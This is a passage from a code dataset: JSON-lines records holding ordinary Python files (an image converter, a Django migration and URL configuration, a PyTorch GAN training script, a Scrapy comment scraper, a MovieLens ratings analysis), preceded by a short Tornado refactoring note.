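`bindboxtouser`, `removebind`, and `transferbind` differ only in the URL suffix and payload; the shared fetch/status-check block can live in one coroutine (a sketch using native `async/await` instead of `@tornado.gen.coroutine`; `post_json` is an illustrative name):

```python
import json

from tornado.httpclient import AsyncHTTPClient

HEADERS = {"Content-type": "application/json; charset=utf-8"}


async def post_json(url: str, payload: dict) -> int:
    response = await AsyncHTTPClient().fetch(
        url,
        method="POST",
        headers=HEADERS,
        body=json.dumps(payload),
        raise_error=False,  # inspect response.code ourselves
    )
    return 200 if 200 <= response.code <= 299 else response.code
```

Each wrapper then reduces to building its `input_para` dict and returning `await post_json(url, input_para)`.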
"line_number": 114, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 121, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 121, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 121, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 83, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_DOMAINKEY_PREFIX", "line_number": 127, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 132, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 132, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 132, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 136, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 136, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis.write_to_redis", "line_number": 147, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 147, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 147, "usage_type": "name"}, {"api_name": "tornado.web.gen", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 125, "usage_type": "name"}, {"api_name": "mickey.commonconf.REDIS_DOMAINKEY_PREFIX", "line_number": 154, "usage_type": "name"}, {"api_name": "mickey.commonconf.redis.read_from_redis", "line_number": 159, "usage_type": "call"}, {"api_name": "mickey.commonconf.redis", "line_number": 159, "usage_type": "attribute"}, {"api_name": "mickey.commonconf", "line_number": 159, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 166, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 166, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 180, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 180, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 180, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 196, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 196, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 196, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 205, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 188, "usage_type": "name"}, {"api_name": "tornado.web.httpclient.AsyncHTTPClient", "line_number": 226, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 226, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 226, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 235, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 218, "usage_type": "name"}, {"api_name": 
"tornado.web.httpclient.AsyncHTTPClient", "line_number": 256, "usage_type": "call"}, {"api_name": "tornado.web.httpclient", "line_number": 256, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 256, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 266, "usage_type": "call"}, {"api_name": "tornado.web.gen", "line_number": 248, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 248, "usage_type": "name"}]} +{"seq_id": "197981845", "text": "import sys\nimport os\nfrom PIL import Image\n\n#grab first and second argument\nimage_folder = sys.argv[1]\noutput_folder = sys.argv[2]\n#check if new/ exists or create one\nif not os.path.exists(output_folder):\n\tos.makedirs(output_folder)\nfor filename in os.listdir(image_folder):\n\timg = Image.open(f'{image_folder}{filename}')\n\tclean_name = os.path.splitext(filename)[0]\n\timg.save(f'{output_folder}{clean_name}.png','png')\n\tprint('all done!')\n\n#loop throu' pokedex and then convert it to png\n#save em to the new folder\n", "sub_path": "image-playground/JPEGtoPNGconverter.py", "file_name": "JPEGtoPNGconverter.py", "file_ext": "py", "file_size_in_byte": 515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 10, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "345735526", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='AboutMe',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200, verbose_name=b'\\xd0\\xbc\\xd0\\xbe\\xd1\\x91 \\xd0\\xb8\\xd0\\xbc\\xd1\\x8f', blank=True)),\n ('about_me', ckeditor.fields.RichTextField(null=True, verbose_name=b'\\xd0\\xbe\\xd0\\xb1\\xd0\\xbe \\xd0\\xbc\\xd0\\xbd\\xd0\\xb5', blank=True)),\n ('public_date', models.DateTimeField(null=True, blank=True)),\n ],\n options={\n 'db_table': 'salon_about_my',\n },\n ),\n migrations.CreateModel(\n name='CkEditor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200, blank=True)),\n ('text_ck', ckeditor.fields.RichTextField(null=True, blank=True)),\n ],\n options={\n 'db_table': 'test_cseditor',\n },\n ),\n ]\n", "sub_path": "index/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, 
"usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "ckeditor.fields.fields.RichTextField", "line_number": 19, "usage_type": "call"}, {"api_name": "ckeditor.fields.fields", "line_number": 19, "usage_type": "attribute"}, {"api_name": "ckeditor.fields", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "ckeditor.fields.fields.RichTextField", "line_number": 31, "usage_type": "call"}, {"api_name": "ckeditor.fields.fields", "line_number": 31, "usage_type": "attribute"}, {"api_name": "ckeditor.fields", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "344526647", "text": "import torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\n\nfrom epochsviz import Epochsviz\nfrom hist import hist\nfrom load_data import load_data\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n### CONSTANTS\n### CONSTANTS\n### CONSTANTS\nfrom models import train_discriminator, train_generator, Discriminator, Generator\n\nHIST_POINTS = 100\nBATCH_SIZE = 128 # 256\nPADDING = 400 # 2000\nFEATURES = 15\nINP_RAND_SIZE = 512\n\n### CONSTANTS\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"GPU is available\")\nelse:\n device = torch.device(\"cpu\")\n print(\"GPU not available, CPU used\")\n\ndata, max_length = load_data(device=device)\n\n# PADDING = max_length\n\n\n\npadded_data: torch.Tensor = torch.nn.utils.rnn.pad_sequence(data, batch_first=True, ).split(split_size=PADDING, dim=1)[0]\n#padded_data = torch.zeros(size=(len(padded_data), PADDING, FEATURES))\n\n\ndata_train = DataLoader(\n padded_data,\n batch_size=BATCH_SIZE,\n shuffle=True\n)\n\nnum_batches = len(data_train)\n\n\ndef noise(size, device) -> torch.Tensor:\n # Generates a 1-d vector of gaussian sampled random values\n return torch.randn(size, INP_RAND_SIZE).to(device=device)\n\n\ntry:\n gen = torch.load('gen_model_')\nexcept:\n gen = Generator(inp=INP_RAND_SIZE, out_length=PADDING, out_features=FEATURES, device=device) # .to(device=device)\n\ntry:\n dis = torch.load('dis_model_')\nexcept:\n dis = Discriminator(samples=PADDING, features=FEATURES, out=1, device=device) # .to(device=device)\n\n# optimizerd1 = optim.SGD(dis.parameters(), lr=0.001, momentum=0.9)\n# optimizerd2 = optim.SGD(gen.parameters(), lr=0.001, momentum=0.9)\n\nd_optimizer = optim.Adam(dis.parameters(), lr=0.005)\ng_optimizer = optim.Adam(gen.parameters(), lr=0.005)\n\n\ndef mae_loss(input, 
target):\n return torch.sum((input - target) ** 2)\n\n\nloss = nn.BCELoss()\n\n### TRAINING\n\n# logger = Logger(model_name='GAN', data_name='Pythia')\n\neviz = Epochsviz(title='figure', plot_width=1200, plot_height=600)\n\n\ndef train():\n num_epochs = 200\n\n for epoch in range(num_epochs):\n d_error = 0\n g_error = 0\n fake_data = torch.Tensor()\n real_data = torch.Tensor()\n for n_batch, batch in enumerate(data_train):\n\n print(str(n_batch))\n N = len(batch)\n\n # 1. Train Discriminator\n # real_data = Variable(images_to_vectors(real_batch))\n real_data: torch.Tensor = batch.to(device=device)\n\n # Generate fake data and detach\n # (so gradients are not calculated for generator)\n fake_data: torch.Tensor = gen(noise(N, device=device)).detach()\n\n # Train D\n d_error, d_pred_real, d_pred_fake = train_discriminator(\n dis=dis,\n optimizer=d_optimizer,\n loss=loss,\n real_data=real_data,\n fake_data=fake_data,\n device=device\n )\n\n # 2. Train Generator\n # Generate fake data\n fake_data = gen(noise(N, device=device))\n\n # Train G\n g_error = train_generator(\n dis=dis,\n optimizer=g_optimizer,\n loss=loss,\n fake_data=fake_data,\n device=device\n )\n\n # Log batch error\n # logger.log(d_error, g_error, epoch, n_batch, num_batches)\n\n # Display Progress every few batches\n\n if (n_batch) % 30 == 0:\n print('epoch: ' + str(epoch) + ', ' +\n 'n_batch: ' + str(n_batch) + ', ' +\n 'd_error: ' + str(d_error.item()) + ', ' +\n 'g_error: ' + str(g_error.item())\n )\n\n plt.pause(0.001)\n\n eviz.send_data(epoch, d_error.item(), g_error.item())\n if epoch%10==0:\n torch.save(dis.state_dict(), './dis_model_' + str(epoch))\n torch.save(gen.state_dict(), './gen_model_' + str(epoch))\n\n '''\n print('REAL DATA 11')\n plt.imshow(real_data.cpu()[11, :, :], )\n plt.colorbar()\n plt.show()\n '''\n\n img_smpls_to_shw = 80\n\n print('REAL DATA')\n for i in range(0, real_data.shape[0], 100):\n plt.figure('Real img:' + str(i))\n plt.imshow(real_data[i, :, :].split(split_size=img_smpls_to_shw, dim=0)[0].cpu())\n plt.ion()\n plt.show()\n plt.figure('Real hist:' + str(i))\n plt.hist(real_data[i, :, 6].cpu().flatten(), 100)\n plt.show()\n plt.pause(0.001)\n\n # plt.figure(1)\n # plt.hist(real_data[:, :, 6].detach().cpu().numpy().flatten(), 100)\n\n\n print('FAKE DATA')\n for i in range(0, fake_data.shape[0], 100):\n plt.figure('Fake img:' + str(i))\n plt.imshow(fake_data[i, :, :].split(split_size=img_smpls_to_shw, dim=0)[0].detach().cpu())\n plt.ion()\n plt.show()\n plt.figure('Fake hist:' + str(i))\n plt.hist(fake_data[i, :, 6].detach().cpu().flatten(), 100)\n plt.show()\n\n plt.pause(0.001)\n\n # plt.figure(2)\n # plt.hist(fake_data[:, :, 6].detach().cpu().numpy().flatten(), 100)\n\n\n\n# After the train function\ntorch.cuda.empty_cache()\neviz.start_thread(train_function=train)\n", "sub_path": "event_generator_pytorch/_old_main.py", "file_name": "_old_main.py", "file_ext": "py", "file_size_in_byte": 5350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 30, "usage_type": "call"}, {"api_name": "load_data.load_data", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 39, 
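`train()` above delegates the actual gradient steps to `train_discriminator` and `train_generator` from `models.py`, whose bodies are not shown here. A generic sketch of what such alternating updates usually look like with `nn.BCELoss` (assuming the discriminator ends in a sigmoid; device handling omitted), not the repository's exact implementation:

```python
import torch
from torch import nn

loss_fn = nn.BCELoss()


def discriminator_step(dis, optimizer, real, fake):
    optimizer.zero_grad()
    # Real samples are labelled 1, fakes 0.
    error = loss_fn(dis(real), torch.ones(real.size(0), 1)) \
        + loss_fn(dis(fake), torch.zeros(fake.size(0), 1))
    error.backward()
    optimizer.step()
    return error


def generator_step(dis, optimizer, fake):
    optimizer.zero_grad()
    # The generator wants the discriminator to output 1 on fakes.
    error = loss_fn(dis(fake), torch.ones(fake.size(0), 1))
    error.backward()
    optimizer.step()
    return error
```

Separately, note that the script saves `gen.state_dict()` but restores with a bare `torch.load('gen_model_')`, which yields an `OrderedDict` of tensors rather than a `Generator`; the matching restore is `gen.load_state_dict(torch.load(path))`.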
"usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Generator", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Discriminator", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BCELoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "epochsviz.Epochsviz", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.train_discriminator", "line_number": 109, "usage_type": "call"}, {"api_name": "models.train_generator", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 
177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.cuda.empty_cache", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 192, "usage_type": "attribute"}]} +{"seq_id": "488106862", "text": "# -*- coding: utf-8 -*-\n__author__ = 'AllenCHM'\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nimport json\nimport pymongo\nfrom scrapy import Request\nimport time\nimport re\nfrom bili.settings import MONGOHOST\n\nclass BilibiCommScrapy(BaseSpider):\n name = u'bilibiComm'\n allowed_domains = [u'bilibili.com', ]\n\n def __init__(self):\n self.connectionMongoDB = pymongo.MongoClient(host=MONGOHOST, port=27017)\n self.db = self.connectionMongoDB['bilibili']\n self.doc = self.db[\"avIndex\"]\n self.userInfo = self.db[\"userInfo\"]\n self.comment = self.db[\"comment\"]\n self.userInfoUrl = u'http://space.bilibili.com/ajax/member/GetInfo?mid='\n\n def start_requests(self):\n count = self.doc.count()\n for k in xrange(0,count, 10000):\n tmp = self.doc.find({}, {u'aid': 1}).skip(k).limit(10000)\n for i in tmp:\n url = u'http://api.bilibili.com/feedback?type=jsonp&ver=3&callback=jQuery17202343479166738689_' + str(int(time.time()*1000)) + u'&mode=arc&aid=' + str(i[u'aid']) + u'&pagesize=20&page=1&_=' + str(int(time.time()*1000))\n yield Request(url, callback=self.parse)\n\n def parse(self, response):\n tmp = re.findall('\\((.*)\\)', response.body, re.S)\n page = re.findall('page=(.*?)&', response.url)[0]\n tmp = json.loads(tmp[0])\n if tmp.has_key(u'list'):\n if tmp[u'list']:\n for i in tmp[u'list']:\n self.comment.update_one({u'aid': int(re.findall('aid=(.*?)&', response.url)[0])},\n {u\"$addToSet\": {u\"feedback\": i}}, True)\n if not self.userInfo.find_one({u'mid':str(i[u'mid'])}, {u'_id':1}):\n yield Request(self.userInfoUrl + str(i[u'mid']), callback=self.parseUserInfoJson)\n if int(page)*20 < tmp[u'results']:\n for i in xrange(int(page)+1, (tmp[u'pages']+20-1)/20):\n url = response.url.split(u'&')\n url[-2] = u'page=' + str(i)\n url = u'&'.join(url)\n yield Request(url, callback=self.parse)\n\n def parseUserInfoJson(self, response):\n try:\n tmp = json.loads(response.body)\n if tmp[u'status']:\n self.userInfo.update_one({u'mid': tmp[u'data'][u'mid']}, {u'$set':tmp[u'data']}, True)\n except:\n pass\n\n def closed(self, reason):\n self.connectionMongoDB.close()", "sub_path": "bilibili/bili/bili/spiders/bilicoment.py", "file_name": "bilicoment.py", "file_ext": "py", "file_size_in_byte": 2549, "program_lang": "python", "lang": 
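The spider above unwraps JSONP by regexing out the parenthesized payload before `json.loads`. That step on its own (`unwrap_jsonp` and the sample body are illustrative):

```python
import json
import re


def unwrap_jsonp(body: str) -> dict:
    # Capture everything between the outermost parentheses of the
    # jQuery-style callback wrapper.
    match = re.search(r"\((.*)\)", body, re.S)
    if match is None:
        raise ValueError("not a JSONP response")
    return json.loads(match.group(1))


print(unwrap_jsonp('jQuery17_123({"code": 0, "pages": 3})'))
# -> {'code': 0, 'pages': 3}
```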
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 13, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 18, "usage_type": "call"}, {"api_name": "bili.settings.MONGOHOST", "line_number": 18, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 31, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 34, "usage_type": "call"}, {"api_name": "re.S", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 40, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 43, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "240894616", "text": "from django.contrib import admin\nfrom django.urls import path, include\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom projects.urls import urlpatterns as projects_urls\nfrom users.urls import urlpatterns as users_urls\nfrom workdays.urls import urlpatterns as workdays_urls\n\ncustom_urls = [\n\n # --- Django admin urls ---\n path('admin/', admin.site.urls),\n\n # --- JWT urls ---\n path('api/token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n\n]\n\napi_urls = [\n\n path('projects/', include(projects_urls)),\n path('users/', include(users_urls)),\n path('workdays/', include(workdays_urls)),\n\n]\n\nurlpatterns = [\n\n path(r'api/', include(api_urls)),\n path('', include(custom_urls)),\n\n]\n", "sub_path": "backend/config/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 23, "usage_type": "call"}, {"api_name": "projects.urls.urlpatterns", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "users.urls.urlpatterns", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", 
"line_number": 25, "usage_type": "call"}, {"api_name": "workdays.urls.urlpatterns", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "511287962", "text": "#coding=utf-8\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport warnings\nwarnings.filterwarnings('ignore')\nnp.random.seed(1)\n#%matplotlib inline\nplt.style.use('ggplot')\n# data = pd.read_csv('ml-20m/ratings_smaller.csv', index_col=0)\n# movies = pd.read_csv('ml-20m/movies_smaller.csv')\n\ndata = pd.read_csv('ml-latest-small/ratings.csv.gz')\nmovies = pd.read_csv('ml-latest-small/movies.csv.gz')\nmovies = movies.set_index('movieId')[['title', 'genres']] #把movieId列作为索引,取'title', 'genres'两列作为数据\nprint(movies.head())\nprint(data.head())\n# How many users?\n#1 unique()统计list、series中的不同值的个数,返回的是list.\n# 2 nunique()可直接统计dataframe中每列的不同值的个数,也可用于series,但不能用于list.返回的是不同值的个数.\nprint (data.userId.nunique(), 'users')\n\n# How many movies?\nprint (data.movieId.nunique(), 'movies')\n\n# How possible ratings?\nprint (data.userId.nunique() * data.movieId.nunique(), 'possible ratings')\n\n# How many do we have?\nprint (len(data), 'ratings')\nprint (100 * (float(len(data)) / (data.userId.nunique() * data.movieId.nunique())), '% of possible ratings')\n\n# Number of ratings per users\nfig = plt.figure(figsize=(10, 10))#figsize:指定figure的宽和高,单位为英寸;\n#画柱状图 x : (n,) array or sequence of (n,) arrays 这个参数是指定每个bin(箱子)分布的数据,对应x轴bins : 这个参数指定bin(箱子)的个数,也就是总共有几条条状图\n#按照userId分组,data.groupby('userId').apply(lambda x: len(x)).values 返回的是一个list ,每个数值是每个UID的评论个数\nax = plt.hist(data.groupby('userId').apply(lambda x: len(x)).values, bins=50)\nplt.title(\"Number of ratings per user\")\n#plt.show()#jupyter不用此语句,在此需要显示图片\n\n#此图y轴显示的是评论数目是某一数值的用户有多少(在测试中可以看)\n\n\n# Number of ratings per movie\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('movieId').apply(lambda x: len(x)).values, bins=50)\nplt.title('Number of ratings per movie')\n#plt.show()\n#此图y轴显示的是评论数目是某一数值的电影有多少(在测试中可以看)\n\n# Ratings distribution\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.rating.values, bins=5)\nplt.title(\"Distribution of ratings\")\n#plt.show()\n#此图Y轴显示的是评分是某个区间的用户有多少\n\n# Average rating per user\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('userId').rating.mean().values, bins=10)\nplt.title(\"Average rating per user\")\n#plt.show()\n#此图Y轴显示的是平均评分是某个区间的用户有多少\n\n# Average rating per movie\nfig = plt.figure(figsize=(10, 10))\nax = plt.hist(data.groupby('movieId').rating.mean().values, bins=10)\nplt.title('Average rating per movie')\n#plt.show()\n#此图Y轴显示的是平均评分是某个区间的电影有多少\n\n# Top Movies\naverage_movie_rating = data.groupby('movieId').mean()#按电影取均值\nprint(average_movie_rating.head())#索引已经变成movieId\n\"\"\"\n userId rating timestamp\nmovieId \n1 335.663793 3.907328 1.079410e+09\n2 338.173913 3.353261 1.074912e+09\n3 299.982759 3.189655 9.449434e+08\n4 342.727273 2.818182 9.638945e+08\n5 284.822581 3.250000 9.855105e+08\n\"\"\"\n\n\ntop_movies = average_movie_rating.sort_values('rating', ascending=False).head(10)\n#pandas中的sort_values()函数原理类似于SQL中的order by,可以将数据集依照某个字段中的数据进行排序,该函数即可根据指定列数据也可根据指定行的数据排序。\n#print top_movies.index.values movie_id [ 465 111387 1757 5003 5007 5037 5042 91007 5056 
